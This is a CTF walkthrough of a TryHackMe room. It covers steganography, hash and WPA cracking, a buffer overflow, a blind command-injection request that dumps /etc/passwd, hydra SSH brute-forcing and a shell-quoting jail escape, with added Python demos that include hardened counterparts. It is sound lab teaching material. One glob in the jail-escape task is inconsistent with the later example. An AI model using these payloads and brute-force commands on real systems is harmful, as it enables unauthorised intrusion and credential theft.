TryHackMe | Tangia (official write-up)

Hello guys, it’s your boy ouranos. In this write-up I will solve the Tangia room from TryHackMe.

I’ll start with a quick nmap scan to see which ports are open:

sudo nmap -sS -sV $IP

[Task 2] Tangia pot

The room starts with a small warm-up challenge; the description points at robots.txt.

That gives us the directory:

In /tangia_pot there is some encoded data that we need to decode with CyberChef, one layer at a time:

From Binary → From Decimal → From Morse Code → From Hex → From Base64

And we have our first flag.

[Task 3] Ginger

The description gives us some hints for our research. We start by downloading the challenge file from FTP (log in as anonymous):

ftp > get ginger.jpg

Then we brute-force the steghide passphrase with stegseek to get at the file hidden inside:

stegseek ginger.jpg

stegseek finds the passphrase (rockstar) and the embedded file, so we extract it with steghide using that passphrase:

steghide extract -sf ginger.jpg -p rockstar

The extracted file is named “dakka_marrakchia” and it looks like song lyrics.

It is actually a program in Rockstar, an esoteric language whose source reads like lyrics. An online Rockstar interpreter runs the script and prints the flag.

[Task 4] Meat

We need to connect to port 5000 to start the challenge. I connected with netcat:

nc $IP 5000

Reading the source the service shows us, input is read with the gets function, which does no bounds checking, so the program is vulnerable to a buffer overflow, and the overflow reaches the variable that holds our access level.

We just need to overflow the buffer so that the access-level byte becomes ‘$’ (0x24). That puts us at admin level and gives us the flag.

[Task 5] Olive oil

We start by downloading the challenge file from http://$IP/olive:

wget http://$IP/olive

The file has no extension, so we run file to identify its format:

file olive

It is a JPEG, so rename it to olive.jpg and run stegseek on it again.

Extract the note with steghide. The note points to a directory containing punchcard.png, which can be decoded with this site.

The punch card leads us to another file.

This file also has no extension, so again we check its format with file:

file flag

Add a .zip extension. Extracting the archive asks for a password, so we need to crack it (more info in this blog):

Use zip2john to extract the password hash from the archive:

zip2john flag.zip > flag.hash

and crack that hash with john:

john --wordlist=/usr/share/wordlists/rockyou.txt flag.hash

With the password recovered, unzip flag.zip to get the flag.

[Task 6] Preserved lemons

The page loads two JavaScript files: cookies.js is a rabbit hole, script.js is our target.

It contains a const named k that needs to be decoded in CyberChef, again layer by layer:

From Base64 → Reverse → From Base64 → remove the | separators → From Decimal → URL Decode

Strip the surrounding [] and pass the result to win(); that gives us the flag.
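The Task 2 and Task 6 recipes are the same idea: each CyberChef operation undoes one layer, and you apply them left to right. The following Python is an added example, not code from the original write-up, that implements both chains as plain functions and runs them on constructed sample blobs; the room’s real data is not reproduced, so FLAG, SAMPLE_POT and SAMPLE_K are made up here, and the Morse table only needs the hex alphabet because the layer beneath it is hex text.

```python
import base64
import urllib.parse

# Morse codes for the hex alphabet only: the layer under Morse is hex text,
# so 0-9 and a-f are the only symbols that can appear.
MORSE = {
    "0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
    "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
    "a": ".-", "b": "-...", "c": "-.-.", "d": "-..", "e": ".", "f": "..-.",
}
UNMORSE = {code: sym for sym, code in MORSE.items()}


# One function per CyberChef operation, in the decoding direction.
def from_binary(s):  return bytes(int(b, 2) for b in s.split()).decode()
def from_decimal(s): return bytes(int(d) for d in s.split()).decode()
def from_morse(s):   return "".join(UNMORSE[c] for c in s.split())
def from_hex(s):     return bytes.fromhex(s).decode()
def from_base64(s):  return base64.b64decode(s).decode()
def reverse(s):      return s[::-1]
def drop_pipes(s):   return s.replace("|", " ")
def url_decode(s):   return urllib.parse.unquote(s)


def run(recipe, data):
    """Apply the operations left to right, like a CyberChef recipe."""
    for op in recipe:
        data = op(data)
    return data


# Task 2 (/tangia_pot): binary -> decimal -> morse -> hex -> base64
TANGIA_POT = [from_binary, from_decimal, from_morse, from_hex, from_base64]
# Task 6 (const k): base64 -> reverse -> base64 -> drop '|' -> decimal -> URL decode
PRESERVED_LEMONS = [from_base64, reverse, from_base64, drop_pipes, from_decimal, url_decode]


# Encoders used only to build the constructed samples; each is the inverse
# of one decoding op above.
def to_binary(s):           return " ".join(f"{b:08b}" for b in s.encode())
def to_decimal(s, sep=" "): return sep.join(str(b) for b in s.encode())
def to_morse(s):            return " ".join(MORSE[c] for c in s)
def to_hex(s):              return s.encode().hex()
def to_base64(s):           return base64.b64encode(s.encode()).decode()


FLAG = "tangia{constructed_sample}"  # constructed, not the room's flag

# Constructed stand-in for the /tangia_pot blob: the flag pushed through the
# chain in reverse order (base64 first, binary last).
SAMPLE_POT = to_binary(to_decimal(to_morse(to_hex(to_base64(FLAG)))))

# Constructed stand-in for const k in script.js: the bracketed flag,
# URL-encoded, as '|'-separated decimals, base64'd, reversed, base64'd again.
SAMPLE_K = to_base64(reverse(to_base64(
    to_decimal(urllib.parse.quote("[" + FLAG + "]"), sep="|"))))


def decode_tangia_pot(blob):
    return run(TANGIA_POT, blob)


def decode_preserved_lemons(k):
    # win() wants the bare value, so drop the surrounding brackets.
    return run(PRESERVED_LEMONS, k).strip("[]")


if __name__ == "__main__":
    print(decode_tangia_pot(SAMPLE_POT))
    print(decode_preserved_lemons(SAMPLE_K))
```

Because every stage is its own function, a wrong guess about one layer fails loudly (a KeyError from the Morse table, a padding error from base64) instead of silently producing garbage, which is exactly how you confirm the order of operations when the blob is unknown.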

[Task 7] Ghee

This one is easy: download ghee.cap and crack the WPA handshake it contains with aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt ghee.cap

That will take some time, but it is what it is. The flag is the recovered password wrapped as tangia{passwd}.

[Task 8] Moroccan red gold

The cipher:

TTC CGA TCT TTT ATG CGA { TGC ACC GGT GCA _ ACC AGA _ GAG _ AGA ACT GGT ACA CCG GAG TCA GCA _ AGA AAA AGA ACA GCA TCC }

After some googling we find this DNA code, which lets us decode the flag. The flag format is a useful check on the table: the six codons before the { must spell tangia.

[Task 9] Garlic

Download the executable from http://$IP/door and make it executable:

chmod +x door

then run it:

./door

The binary asks for a PIN before it gives us the ingredient, so we open it in Ghidra and look at the main function.

There we see the PIN compared against a hex constant (0x1368); converted to decimal that is 4968.

That is the PIN that unlocks the executable.

[Task 10] where

You just need to Google the question to get the answer; don’t confuse it with the city.

[Task 11] Farnatchi

We need our best farnatchi to help us. There are not many clues in this challenge; inspecting the page source reveals a JavaScript file that fetches an API.

The comments in it point us in the right direction for a Google search; keep in mind that the API is built with Node.

We find a CVE and, reading it, learn that it is an RCE. We exploit it manually through the get[] parameter. We cannot get a reverse shell and the command output is not reflected in the response, but commands do execute, and that is where the FTP server comes in: redirect the output to a file under the anonymous FTP root and fetch it from there.

Command to execute: cat /etc/passwd > /var/ftp/users.txt

http://10.10.28.60:6969/api/services?get[]=$(cat%20/etc/passwd%20%3E%20/var/ftp/users.txt)

Then grab the result from FTP:

get users.txt and look at the users (the accounts with a real login shell are the interesting ones).
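The injection works because the parameter ends up inside a command string that a shell parses, so $(...) is run as a command substitution; with nothing reflected, the trick is to redirect the output somewhere you can read it back. The Python below is an added example, not the room’s Node API or the CVE’s code: lookup_vulnerable models the bug class with a shell-interpreted string, lookup_hardened runs the same feature with no shell so the payload stays literal, and exploit_url builds the request the write-up sends by hand. The echo command, the 6969 port path and the drop file location are the only things taken from the page; the temporary directory stands in for /var/ftp and is constructed here.

```python
import os
import shlex
import subprocess
import tempfile
from urllib.parse import urlencode, quote


def lookup_vulnerable(service):
    """Models the bug class: the request parameter is pasted into a command
    string that /bin/sh interprets, so $(...) inside it is executed."""
    cmd = f"echo service={service}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_hardened(service):
    """Same feature with no shell in the loop: the parameter is one argv
    element, and $(...) is just text to the program that receives it."""
    return subprocess.run(["echo", f"service={service}"],
                          capture_output=True, text=True).stdout


def blind_payload(drop_path):
    """Nothing is reflected, so redirect the output to a file we can fetch
    afterwards (in the room, the anonymous FTP root /var/ftp)."""
    return f"$(cat /etc/passwd > {shlex.quote(drop_path)})"


def exploit_url(host, drop_path):
    """The request from the write-up with every reserved character encoded;
    the server decodes it to the same string either way."""
    qs = urlencode({"get[]": blind_payload(drop_path)}, quote_via=quote)
    return f"http://{host}:6969/api/services?{qs}"


def demo():
    """Fire the payload at both versions and report whether the drop file
    appeared. Returns (vuln_output, vuln_wrote_file, hard_output, hard_wrote_file)."""
    with tempfile.TemporaryDirectory() as d:          # constructed stand-in for /var/ftp
        drop = os.path.join(d, "users.txt")
        payload = blind_payload(drop)
        v_out = lookup_vulnerable(payload).strip()
        v_wrote = os.path.exists(drop) and os.path.getsize(drop) > 0
        if os.path.exists(drop):
            os.remove(drop)
        h_out = lookup_hardened(payload).strip()
        h_wrote = os.path.exists(drop)
        return v_out, v_wrote, h_out, h_wrote


if __name__ == "__main__":
    print(exploit_url("10.10.28.60", "/var/ftp/users.txt"))
    print(demo())
```

In the vulnerable run the response only says service= because the substitution’s stdout went to the file, which is exactly what a blind injection looks like from the client side; the hardened run echoes the payload back untouched and writes nothing.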

Once we know a username, we brute-force SSH with hydra:

hydra -l <user> -P /usr/share/wordlists/rockyou.txt $IP ssh

After a while hydra finishes and we have the user’s password.

Log in over SSH with those credentials.

[Task 12] Mint tea

Checking our sudo rights (sudo -l) shows that we may run atay as root.

atay.py is a jail: a filter refuses most commands that read files.

To bypass it we use double quotes and ? wildcards, which the filter sees as literal characters but the shell removes or expands before running the command:

ca"t" /ro?t/??ay.?txt

The Python filter never sees the string cat or the real file name, but the shell performs quote removal (ca"t" becomes cat) and pathname expansion (each ? matches one character) before executing, so the read goes through.
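A filter that inspects the raw string is judging text the shell will rewrite. The following Python is an added example, not atay.py itself (the room’s filter is not shown, so the BLOCKED list is an assumption): naive_filter is a substring blacklist of the kind such jails use, effective_argv shows what the shell runs after quote removal, hardened_filter checks that instead and refuses wildcards, and read_secret_via_bypass runs the same ca"t" plus ? trick for real against a constructed secret file in a temporary directory.

```python
import os
import shlex
import subprocess
import tempfile

# Assumed blacklist of "reading" commands standing in for the real atay.py filter.
BLOCKED = ("cat", "less", "more", "head", "tail", "strings")

# The bypass exactly as used in the room.
ROOM_BYPASS = 'ca"t" /ro?t/??ay.?txt'


def naive_filter(cmd):
    """Blacklist applied to the raw text, as a jail typically does.
    Returns True when the command is allowed through."""
    return not any(word in cmd for word in BLOCKED)


def effective_argv(cmd):
    """What /bin/sh will run: shlex does the same quote removal, so ca"t"
    becomes cat. Wildcards are still unexpanded at this stage."""
    return shlex.split(cmd)


def hardened_filter(cmd):
    """Judge the post-quote-removal argv and refuse glob metacharacters, so
    the check applies to the command the shell will actually execute."""
    try:
        argv = effective_argv(cmd)
    except ValueError:          # unbalanced quotes
        return False
    if not argv or os.path.basename(argv[0]) in BLOCKED:
        return False
    return not any(ch in tok for tok in argv for ch in "*?[")


def read_secret_via_bypass():
    """Create a constructed secret and read it with the quote + wildcard
    trick; the directory name is never typed and 'cat' never appears."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "atay.txt"), "w") as f:
            f.write("tangia{constructed_sample}\n")   # constructed secret
        evasion = f'ca"t" {d}/??ay.t?t'             # ??ay.t?t globs to atay.txt
        out = subprocess.run(evasion, shell=True, capture_output=True, text=True).stdout
    return out.strip()


if __name__ == "__main__":
    print("naive filter lets it through:", naive_filter(ROOM_BYPASS))
    print("hardened filter blocks it:   ", not hardened_filter(ROOM_BYPASS))
    print("shell will run:", effective_argv(ROOM_BYPASS))
    print(read_secret_via_bypass())
```

The lesson for the defender is that a blacklist on the raw string is the wrong layer: either parse the command the way the shell will and allow-list the program names you actually need, or do not hand user text to a shell at all.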

[The end]

Thank you for completing the Tangia room, I hope you enjoyed it.

-0UR4N05